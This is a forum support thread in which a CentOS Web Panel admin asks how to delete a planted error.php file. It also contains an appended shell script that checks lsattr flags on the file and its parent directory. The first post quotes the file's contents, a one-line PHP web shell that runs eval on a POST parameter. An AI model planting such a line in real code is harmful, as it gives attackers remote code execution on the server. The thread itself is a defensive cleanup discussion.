Author Topic: Cannot Delete File  (Read 20 times)

Cannot Delete File
« on: July 17, 2025, 12:18:47 AM »
On my server running CWP, I recently found a file located in `/usr/local/cwpsrv/htdocs/admin/admin` called `error.php` that just has the contents `<?php @eval($_POST['shell']);?>` (very concerning).

`whoami` returns `root`.

`rm -rf error.php` returns “Permission denied.”

`lsattr error.php` returns `-------------e-- error.php`.

`getfacl error.php` returns:
```
# file: error.php
# owner: root
# group: root
user::rwx
group::r-x
other::r-x
```

`mount | grep "$(df error.php | tail -1 | awk '{print $1}')"` returns:

`/dev/mapper/centos_centos7-root on / type ext4 (rw,relatime,data=ordered)`

This file was obviously not included with the standard cwpsrv files. What else can I do to delete this file?

Re: Cannot Delete File
« Reply #1 on: July 17, 2025, 12:44:52 AM »
Not present on any servers I manage (one CentOS 7.9 holdout, a couple of AlmaLinux 8 servers, a couple of AL9 test beds).
Try to see if the immutable bit is set, then remove:
```
chattr -i error.php
rm -rf error.php
```

Re: Cannot Delete File
« Reply #2 on: July 17, 2025, 01:07:43 AM »
That did not work. I have removed the I(mmutable) and e(xtent) flags. `lsattr` returns `--------------`.

Re: Cannot Delete File
« Reply #3 on: Today at 04:18:03 AM »
Ditto to what @overseer posted.

On our AL9 servers, there is no `error.php` in `/usr/local/cwpsrv/htdocs/admin/admin`.

One other thing you can try is to go to User Accounts -> Fix Permissions -> Select User (nobody), click on all 3 boxes, and then the blue bar 'Fix Selected Issues'.
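
Deleting a file rewrites the directory that holds its entry, so the `lsattr` check used in this thread applies to the parent directory as well as to `error.php`. The helper below is an added example, not part of any post above: it reads `lsattr` output for both and reports the `i` (immutable) and `a` (append-only) flags. The function names and the sample lines in the comments, other than the one quoted from the first post, are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the thread): report ext attribute flags that
# block unlink on a file and on the directory that holds its entry.

# blocking_flags LSATTR_LINE
# Takes one line of `lsattr` output, e.g. "-------------e-- error.php"
# (from the first post) or "----i--------e-- ./admin" (constructed).
# Only the first field is inspected, so letters in the file name
# ("admin" contains both 'a' and 'i') cannot cause a false match.
# Prints the blocking flags found: i (immutable), a (append-only),
# or "none". 'e' (extents) and 'A' (no atime) do not block deletion.
blocking_flags() {
    field=${1%% *}
    found=""
    case "$field" in *i*) found="${found}i" ;; esac
    case "$field" in *a*) found="${found}a" ;; esac
    printf '%s\n' "${found:-none}"
}

# report_flags PATH
# Runs lsattr on PATH itself (-d: do not list a directory's contents)
# and prints the raw flag field plus the verdict from blocking_flags.
report_flags() {
    line=$(lsattr -d -- "$1" 2>/dev/null)
    if [ -z "$line" ]; then
        printf '%s: attributes unavailable\n' "$1"
        return 1
    fi
    printf '%s: flags=%s blocking=%s\n' \
        "$1" "${line%% *}" "$(blocking_flags "$line")"
}

# diagnose FILE
# Checks the file first, then its parent directory.
diagnose() {
    report_flags "$1"
    report_flags "$(dirname -- "$1")"
}

# Run only when a path is given, e.g.: sh check_flags.sh ./error.php
if [ "$#" -gt 0 ]; then
    diagnose "$1"
fi
```

A `blocking=` value other than `none` on the directory line means `chattr` has to be applied to the directory, not only to the file, before `rm` can succeed.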